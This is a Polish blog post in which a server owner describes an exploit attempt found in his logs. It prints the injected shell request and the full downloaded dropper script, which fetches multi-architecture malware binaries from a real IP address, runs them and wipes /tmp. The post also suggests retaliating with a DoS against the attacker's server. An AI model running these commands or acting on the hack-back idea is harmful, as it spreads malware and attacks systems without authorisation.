Hacker!

Pamiętacie mój post na temat niebezpieczeństwa który pisałem nie tak dawno? Ostatnio zauważyłem kolejne dziwne zapytanie które trafiło do mojego serwera.

Tym razem przypadek ten jest świerzy i mogę więcej o nim napisać, dlatego też wydaje się ciekawszy, a ja postaram się go lepiej przybliżyć niż tylko pobierznie opisać.

Podejrzane zapytanie które znalazłem teraz w logach mojego serwera wyglądało następująco:

GET /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws

Jak widać jest to jakieś dziwne zapytanie zakładające, że resource /shell będzie wykonywał podane dalej komendy. Nie wiem wprawdzie skąd takie założenie. Być może to jakaś znana podatność, chociaż bardzo dziwnym byłoby wystawianie skryptu wykonującego komendy w shellu od tak sobie dostępnego dla każdego.

Jak można łatwo zuważyć przesłana komenda zakłada przejście do katalogu /tmp, usunięcie wszystkiego co się tam znajduje, a następnie pobranie podejrzanego skryptu oraz uruchomienie go. Oczywiście to się nie stało, ponieważ serwer odpowiedział kodem 404 i na tym "atak" się zakończył, ale nie myślcie, że to koniec opisu, bo ja, specjalnie dla was postanowiłem być na tyle szalony i samemu pobrałem ten skrypt, tak z ciekawości.

Oto jak wygląda podejrzany skrypt:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.x86; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.x86; cat z0r0.x86 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.mips; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.mips; cat z0r0.mips > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.mpsl; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.mpsl; cat z0r0.mpsl > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm; cat z0r0.arm > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm5; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm5; cat z0r0.arm5 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm6; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm6; cat z0r0.arm6 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm7; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arm7; cat z0r0.arm7 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.ppc; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.ppc; cat z0r0.ppc > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.m68k; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.m68k; cat z0r0.m68k > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.spc; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.spc; cat z0r0.spc > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.i686; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.i686; cat z0r0.i686 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.sh4; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.sh4; cat z0r0.sh4 > zeros6x; chmod +x *; ./zeros6x jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arc; curl -O http://194.15.36.96/x0ox0ox0oxDefault/z0r0.arc; cat z0r0.arc > zeros6x; chmod +x *; ./zeros6x jaws.exploit

Przy okazji od razu powiem, że sprawdziłem i jest to jakiś exploit biblioteki/aplikacji (nie wiem do końca) jaws? Tak mniej więcej to wyglądało. Ogólnie byłem dosyć zaskoczony tym skryptem. No sami sobie na niego zobaczcie. Jak miło, że hacker się przygotował na różne ewentualności i postanowił pobrać ten exploit skompilowany pod różne architektury. Czyż to nie wspaniałe?

Samego exploita, nie chciało mi się już pobierać, ale za to ciekawił mnie ten adres IP z którego skrypt ma za zadanie pobrać wirus. Sprawdziłem wykonując połączenie przy pomocy CURL, że rzeczywiście pod tymi adresami są serwowane odwiedzającym je exploity różnej maści. Co ciekawe z nagłówka odpowiedzi dowiedziałem się też ciekawej rzeczy:

Server: Apache/2.2.15 (CentOS)

O takiej właśnie. Serwer jest na systemie CentOS i jest to Apache 2.2.15 Swoją drogą ta wersja serwera Apache też ma swoje podatności np. DoS poprzez multi range requests. Co myślicie o zrobieniu hackerowi małej niespodzianki?

Na zakończenie tego postu chciałbym, nawiązując do poprzedniego akapitu, zapytać się was, co sądzicie o tym, żeby takie serwery hostujące złośliwe oprogramowanie ubijać? Czyż to nie dobry pomysł? Jak to mówią: "Zaatakowane imperium kontratakuje!". Dlaczego by się do tego nie zastosować w tym przypadku? (Wiem, że nikt na to nie odpowie, bo nie ma opcji kometarzy, ale spokojnie, kiedyś je dadam, a wtedy! Ha, wtedy będzie można odpowiedzieć)